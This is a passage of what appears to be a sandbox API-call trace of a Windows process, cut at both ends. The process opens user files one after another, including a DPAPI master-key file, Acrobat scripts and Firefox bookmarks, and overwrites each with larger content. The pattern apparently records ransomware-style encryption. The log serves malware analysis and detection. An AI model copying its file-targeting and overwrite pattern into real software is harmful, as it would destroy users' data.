lpOverlapped=0x0) returned 1 [0177.462] CloseHandle (hObject=0x1f0) returned 1 [0177.462] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.463] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.463] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x180 [0177.463] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.463] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.463] ReleaseMutex (hMutex=0x168) returned 1 [0177.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0177.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", cchWideChar=65, lpMultiByteStr=0x1fac7bc, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpUsedDefaultChar=0x0) returned 65 [0177.464] ReadFile (in: hFile=0x1f0, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x180, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x311f2bc*=0x180, lpOverlapped=0x0) returned 1 [0177.465] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0177.465] WriteFile (in: hFile=0x1f0, lpBuffer=0x2848ae8*, nNumberOfBytesToWrite=0x708, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2848ae8*, lpNumberOfBytesWritten=0x311f2d0*=0x708, lpOverlapped=0x0) returned 1 [0177.465] CloseHandle (hObject=0x1f0) returned 1 [0177.465] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.466] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.466] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x182 [0177.466] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.466] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.466] ReleaseMutex (hMutex=0x168) returned 1 [0177.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0177.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", cchWideChar=65, lpMultiByteStr=0x1fac7bc, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpUsedDefaultChar=0x0) returned 65 [0177.466] ReadFile (in: hFile=0x1f0, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x182, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x311f2bc*=0x182, lpOverlapped=0x0) returned 1 [0177.467] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0177.467] WriteFile (in: hFile=0x1f0, lpBuffer=0x2848ae8*, nNumberOfBytesToWrite=0x70a, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2848ae8*, lpNumberOfBytesWritten=0x311f2d0*=0x70a, lpOverlapped=0x0) returned 1 [0177.467] CloseHandle (hObject=0x1f0) returned 1 [0177.468] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.468] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.468] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x18e [0177.468] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.468] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.468] ReleaseMutex (hMutex=0x168) returned 1 [0177.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0177.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", cchWideChar=65, lpMultiByteStr=0x1fac7bc, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpUsedDefaultChar=0x0) returned 65 [0177.469] ReadFile (in: hFile=0x1f0, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x18e, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x311f2bc*=0x18e, lpOverlapped=0x0) returned 1 [0177.469] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0177.470] WriteFile (in: hFile=0x1f0, lpBuffer=0x2848ae8*, nNumberOfBytesToWrite=0x716, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2848ae8*, lpNumberOfBytesWritten=0x311f2d0*=0x716, lpOverlapped=0x0) returned 1 [0177.470] CloseHandle (hObject=0x1f0) returned 1 [0177.470] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.493] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.493] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x8e062 [0177.493] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.493] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.493] ReleaseMutex (hMutex=0x168) returned 1 [0177.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="au.cab", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0177.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="au.cab", cchWideChar=6, lpMultiByteStr=0x1f7ad5c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="au.cab", lpUsedDefaultChar=0x0) returned 6 [0177.493] ReadFile (in: hFile=0x1f0, lpBuffer=0x2840938, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0177.498] ReadFile (in: hFile=0x1f0, lpBuffer=0x2840938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.511] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x8d062 [0177.511] ReadFile (in: hFile=0x1f0, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.532] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x8d062 [0177.532] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.533] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0177.533] WriteFile (in: hFile=0x1f0, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0177.533] WriteFile (in: hFile=0x1f0, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0177.533] CloseHandle (hObject=0x1f0) returned 1 [0177.533] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.534] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.534] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xa [0177.535] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.535] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.535] ReleaseMutex (hMutex=0x168) returned 1 [0177.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="glob.settings.js", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0177.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="glob.settings.js", cchWideChar=16, lpMultiByteStr=0x1f8867c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="glob.settings.js", lpUsedDefaultChar=0x0) returned 16 [0177.535] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f7ad58, nNumberOfBytesToRead=0xa, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f7ad58*, lpNumberOfBytesRead=0x311f2bc*=0xa, lpOverlapped=0x0) returned 1 [0177.536] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0177.536] WriteFile (in: hFile=0x1f0, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x592, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x311f2d0*=0x592, lpOverlapped=0x0) returned 1 [0177.536] CloseHandle (hObject=0x1f0) returned 1 [0177.536] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\E12TXiVsk-KsA.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\e12txivsk-ksa.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.537] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.537] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x139f7 [0177.537] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.537] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.537] ReleaseMutex (hMutex=0x168) returned 1 [0177.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="E12TXiVsk-KsA.flv", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0177.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="E12TXiVsk-KsA.flv", cchWideChar=17, lpMultiByteStr=0x1f8867c, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="E12TXiVsk-KsA.flv", lpUsedDefaultChar=0x0) returned 17 [0177.537] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a56a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0177.538] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x129f7 [0177.538] ReadFile (in: hFile=0x1f0, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.538] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x129f7 [0177.539] WriteFile (in: hFile=0x1f0, lpBuffer=0x284aac8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x284aac8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.539] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0177.539] WriteFile (in: hFile=0x1f0, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0177.539] CloseHandle (hObject=0x1f0) returned 1 [0177.539] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\1033\\global.mpt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.541] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.541] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x5f600 [0177.541] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.541] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.541] ReleaseMutex (hMutex=0x168) returned 1 [0177.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Global.MPT", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0177.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Global.MPT", cchWideChar=10, lpMultiByteStr=0x1f7362c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Global.MPT", lpUsedDefaultChar=0x0) returned 10 [0177.541] ReadFile (in: hFile=0x1f0, lpBuffer=0x2840938, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x311f278*=0x8000, lpOverlapped=0x0) returned 1 [0177.546] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x5e600 [0177.546] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.616] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x5e600 [0177.616] WriteFile (in: hFile=0x1f0, lpBuffer=0x289dad8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x289dad8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.616] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0177.616] WriteFile (in: hFile=0x1f0, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x311f28c*=0x8000, lpOverlapped=0x0) returned 1 [0177.616] CloseHandle (hObject=0x1f0) returned 1 [0177.616] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.617] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.617] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1d4 [0177.617] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.617] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.617] ReleaseMutex (hMutex=0x168) returned 1 [0177.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="2be989a0-16a1-424b-9211-51aa3bb43e5d", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0177.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="2be989a0-16a1-424b-9211-51aa3bb43e5d", cchWideChar=36, lpMultiByteStr=0x1fa53fc, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2be989a0-16a1-424b-9211-51aa3bb43e5d", lpUsedDefaultChar=0x0) returned 36 [0177.617] ReadFile (in: hFile=0x1f0, lpBuffer=0x26dd2c8, nNumberOfBytesToRead=0x1d4, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26dd2c8*, lpNumberOfBytesRead=0x311f2bc*=0x1d4, lpOverlapped=0x0) returned 1 [0177.642] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0177.642] WriteFile (in: hFile=0x1f0, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x75c, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x311f2d0*=0x75c, lpOverlapped=0x0) returned 1 [0177.642] CloseHandle (hObject=0x1f0) returned 1 [0177.642] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.685] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.685] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xbdb [0177.685] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.685] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.685] ReleaseMutex (hMutex=0x168) returned 1 [0177.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bookmarks-2017-06-05_5.json", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0177.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bookmarks-2017-06-05_5.json", cchWideChar=27, lpMultiByteStr=0x1f8fc3c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 